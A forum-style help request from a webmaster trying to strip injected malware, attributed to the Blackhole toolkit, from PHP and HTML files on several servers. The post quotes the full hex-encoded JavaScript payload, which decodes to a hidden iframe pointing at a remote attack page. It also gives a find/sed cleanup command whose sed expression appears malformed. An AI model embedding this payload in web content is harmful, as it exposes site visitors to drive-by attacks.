Recently I've been trying to fix a slew of viruses on my server which I suspect is due to the Blackhole toolkit. It appends a js-script to the end of index.php and .html files which looks like this..
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
It's a encoded version of the standard iframe virus. I've been trying to remove it by running a php script like the one below. (which was a solution from stack overflow).
$dir = "./";
$removejs = `find $dir -name "*.php" -type f |xargs sed -i '<script>var t=.*eval.*script>##g' 2>&1`;
The problem is, the script works for some servers while others just seem to have no effect. Does anyone know why? I've tried it on at least 10 separate webhosts. The script only runs successfully on about 3 hosts. The rest just doesn't do anything. What settings do I need to change ?
Appreciate any help I can get. Thanks !
